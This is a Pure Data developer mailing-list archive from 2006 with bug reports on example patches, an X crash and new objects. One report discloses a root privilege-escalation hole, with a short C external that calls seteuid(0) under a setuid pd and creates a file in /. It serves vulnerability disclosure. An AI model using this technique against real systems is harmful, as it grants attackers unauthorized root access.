[PD-dev] [ pure-data-Bugs-1602617 ] some small issues in doc/3.audio.examples/

2006-11-24 Thread SourceForge.net
Bugs item #1602617, was opened at 2006-11-25 06:56
Message generated for change (Tracker Item Submitted) made by Item Submitter
You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602617&group_id=55736

Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: puredata
Group: None
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: ClaudiusMaximus (claudiusmaximus)
Assigned to: Nobody/Anonymous (nobody)
Summary: some small issues in doc/3.audio.examples/

Initial Comment:
Tested with pd-0.40-2 from Miller's site.

D10.sampler.notes.pd
error: ($4: argument number out of range
error: tabread4~: sample0: no such array
error: tabwrite~: sample: no such array

E07.evenodd.pd
error: array1: no such object
error: array1: no such object
error: array1: no such object

E10.complex.FM.pd
error: tabwrite~: E10-signal: no such array

H04.filter.sweep.pd
error: tabread4~: mtof: no such array

H05.filter.floyd.pd
error: 1280-metro: no such object

H15.phaser.pd
error: 1337-pole: no such object

I07.phase.vocoder.pd
error: detune: no such object

J01.even.odd.pd
pd: unknown message DSP  1


--

You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602617&group_id=55736

___
PD-dev mailing list
PD-dev@iem.at
http://lists.puredata.info/listinfo/pd-dev


[PD-dev] [ pure-data-Bugs-1602345 ] security vulnerability, giving root access

2006-11-24 Thread SourceForge.net
Bugs item #1602345, was opened at 2006-11-24 10:48
Message generated for change (Tracker Item Submitted) made by Item Submitter
You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602345&group_id=55736

Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: puredata
Group: None
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: Mathieu Bouchard (matju)
Assigned to: Nobody/Anonymous (nobody)
Summary: security vulnerability, giving root access

Initial Comment:
first configure with --enable-setuid or just chmod 4755 pd && chown root pd, 
which has the same effect.

then load this external called crack.c by making a [crack] box or -lib crack:

#include 
#include 
void crack_setup (void) {
  seteuid(0);
  fopen("/hax0r","w");
}

An empty file called "hax0r" appears in protected folder "/" even though 
privileges have been dropped by pd upon startup.


--

You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602345&group_id=55736

___
PD-dev mailing list
PD-dev@iem.at
http://lists.puredata.info/listinfo/pd-dev


[PD-dev] four new polyphony management objects

2006-11-24 Thread Ed Kelly
Greetings all,

After a long hiatus there are four new polyphony
management objects in my folder - and a bugfix for
hasc~ (it wouldn't compile).

sieve
polymap
polystat
maskxor

- are new, and may be useful for more than just poly
stuff.

The helpfile for hasc~ is on the way, since I just
noticed it's not there! On a day when I am teaching
less...

Best,
Ed


->
->
-->
--->
->
>
-> 
-> 

"Genius is attention to detail" Louis Pasteur

Send instant messages to your online friends http://uk.messenger.yahoo.com 

___
PD-dev mailing list
PD-dev@iem.at
http://lists.puredata.info/listinfo/pd-dev


Re: [PD-dev] [ pure-data-Bugs-1602066 ] iemgui empty vertical offset crashes X on Linux

2006-11-24 Thread Claude Heiland-Allen
Frank Barknecht wrote:
> Hallo,
> SourceForge.net hat gesagt: // SourceForge.net wrote:
> 
>> Summary: iemgui empty vertical offset crashes X on Linux
>>
>> Initial Comment:
>> Steps to crash X windowing system on Linux using Pd:
>>
>> 1. Start X
>> 2. Start Pd
>> 3. Create a new patch
>> 4. Create a new vslider in that patch
>> 5. Open the properties window for that vslider
>> 6. Set the label to x, and delete all text in the y-off field
>> 7. to cause X to crash, click apply
>>
>> at this point X starts to use 100% CPU and its memory usage shoots up, 
>> making the whole machine largely unresponsive and requiring X to be aborted 
>> with Ctrl-Alt-Backspace
> 
> Doesn't crash here at all, CPU usage stays low. Am I doing something
> wrong?
> 
> Ciao

Don't know - I just tried with a freshly compiled pd-0.40-2 from
Miller's site, on the same linux install, and got the same crash, so
I've got a feeling it must be something in my tcl/tk and/or X versions
that is to blame...

Thanks,


Claude

___
PD-dev mailing list
PD-dev@iem.at
http://lists.puredata.info/listinfo/pd-dev